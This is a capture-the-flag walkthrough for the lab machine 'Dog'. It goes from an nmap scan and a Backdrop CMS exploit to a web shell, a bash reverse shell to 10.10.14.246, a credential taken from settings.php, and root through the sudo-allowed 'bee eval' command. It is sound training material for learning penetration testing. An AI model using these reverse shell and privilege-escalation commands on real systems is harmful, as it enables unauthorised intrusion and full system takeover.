Dog
Easy - Linux
Enumeration
Ports
nmap -p- --open -sCV --top-ports 500 10.10.11.58
###
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelWebsites
Classsic Virtual Hosting dog.htb
Possible Usernames: dogBackDropSystem && Anonymous
CMS with name Backdrop
Is available the login addres -->
Hack the WebApp
User Enumeration
With it we can see, that the user dogBackDropSystem is available. Okay, we now search some inforamtion about exploits of Backdrop CMS 1.27.1
Exploit Database
Nice! sooo, now download it and execute the script -->
WebShell
NICE! Now, create a revershell and we put the netcat of lisener on any port -->
nc -nvlp 1234
##
bash -c 'bash -i >& /dev/tcp/10.10.14.246/1234 0>&1'
I do me TTI treatment -->
script /dev/null -c bash Ctrl+z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 45 columns 184 ##dimensiones pantalla portatil
Into the web path we can see a archive with name settings.php, and inside it we can read a password:
First Climb
johncusack:BackDropJ2024DS2024Now, i list the current user into this machine -->
And try to su in there are -->
Root Climb
With it, see the sudo permissions -->
We can see that this user will can bee of all permissions, so...
After investigate, i found a eval funtion with we can do a command execution -->
sudo /usr/local/bin/bee --root=/var/www/html eval 'system("cat /root/root.txt");'
Last updated